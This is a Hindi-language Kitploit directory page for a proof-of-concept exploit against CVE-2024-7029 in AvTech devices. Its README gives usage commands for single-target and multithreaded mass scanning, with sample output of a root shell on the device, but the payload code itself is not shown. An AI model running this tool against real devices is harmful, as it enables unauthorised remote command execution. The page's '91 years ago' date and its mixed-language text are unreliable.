Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-7029 — AvTech उपकरणों में पाए गए CVE-2024-7029 भेद्यता के लिए एक PoC शोषण, जो रिमोट कोड निष्पादन (RCE) की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/geniuszly/cve-2024-7029
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल
GitHubgeniuszly/cve-2024-7029

CVE-2024-7029

AvTech उपकरणों में पाए गए CVE-2024-7029 भेद्यता के लिए एक PoC शोषण, जो रिमोट कोड निष्पादन (RCE) की अनुमति देता है।

रिपॉजिटरी देखें
91 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

EN

GenAvTechRCEExploit CVE-2024-7029 में पाई गई AvTech उपकरणों की कमज़ोरी के लिए एक PoC शोषण, जो रिमोट कोड निष्पादन (RCE) की अनुमति देता है। यह उपकरण कमज़ोर उपकरणों को स्कैन कर सकता है और उन पर इंटरैक्टिव रूप से कमांड निष्पादित कर सकता है।

विशेषताएँ

  • कमज़ोरी का पता लगाना: जाँचें कि AvTech उपकरण RCE के लिए कमज़ोर हैं या नहीं।
  • इंटरैक्टिव शेल: इंटरैक्टिव शेल के माध्यम से लक्ष्य उपकरण पर कमांड निष्पादित करें।
  • मल्टीथ्रेडेड स्कैनिंग: मल्टीथ्रेडिंग का उपयोग करके एक साथ कई लक्ष्यों को स्कैन करें।
  • पेलोड निष्पादन: रिमोट रूप से कमांड निष्पादित करने के लिए तैयार पेलोड भेजकर लक्ष्यों का शोषण करें।

आवश्यकताएँ

  • Python 3.7+
  • requests लाइब्रेरी
  • prompt_toolkit लाइब्रेरी
  • alive_progress लाइब्रेरी

आवश्यक लाइब्रेरीज़ को इस प्रकार स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

उपयोग

एकल लक्ष्य को स्कैन करें

एकल लक्ष्य की कमज़ोरी की जाँच करने और इंटरैक्टिव शेल शुरू करने के लिए:

root@kitploit:~
python3 GenAvTechRCEExploit.py -u <target_url>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100

[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки

<target_url> को लक्ष्य उपकरण के वास्तविक URL से बदलें।

एकाधिक लक्ष्यों को स्कैन करें

एक फ़ाइल में प्रदान किए गए एकाधिक लक्ष्यों (प्रति पंक्ति एक URL) को स्कैन करने के लिए:

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -f targets.txt

Scanning Targets |████████████████████████████████████████| 100% 
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима

<file_path> को उस फ़ाइल के पथ से बदलें जिसमें लक्ष्य URL हों।

थ्रेड्स

आप -t विकल्प के साथ स्कैनिंग के लिए थ्रेड्स की संख्या निर्दिष्ट कर सकते हैं:

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>

डिफ़ॉल्ट रूप से, थ्रेड्स की संख्या 10 पर सेट है।

उदाहरण

root@kitploit:~
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20

RU

GenAvTechRCEExploit - эксплоит для CVE-2024-7029 в устройствах AvTech, позволяющая удаленное выполнение кода (RCE). Этот инструмент может сканировать уязвимые устройства и выполнять на них команды в интерактивном режиме.

Возможности

  • Поиск уязвимостей: Проверка устройств AvTech на уязвимость к RCE.
  • Интерактивная оболочка: Выполнение команд на целевом устройстве через интерактивную оболочку.
  • Многопоточное сканирование: Одновременное сканирование нескольких целей с использованием многопоточности.
  • Выполнение полезной нагрузки: Эксплуатация целей путем отправки специально сформированной полезной нагрузки для удаленного выполнения команд.

Требования

  • Python 3.7+
  • Библиотека requests
  • Библиотека prompt_toolkit
  • Библиотека alive_progress

Установить необходимые библиотеки можно с помощью:

root@kitploit:~
pip install -r requirements.txt

Использование

Сканирование одной цели

Для проверки уязвимости одной цели и запуска интерактивной оболочки:

root@kitploit:~
python3 GenAvTechRCEExploit.py -u <target_url>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100

[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки

Замените <target_url> на реальный URL целевого устройства.

Сканирование нескольких целей

Для сканирования нескольких целей, указанных в файле (один URL на строку):

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -f targets.txt

Scanning Targets |████████████████████████████████████████| 100% 
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима

Замените <file_path> на путь к файлу, содержащему URL-адреса целей.

Потоки

Вы можете указать количество потоков для сканирования с помощью опции -t:

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>

По умолчанию количество потоков установлено на 10.

Пример

root@kitploit:~
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
टूल डाउनलोड करें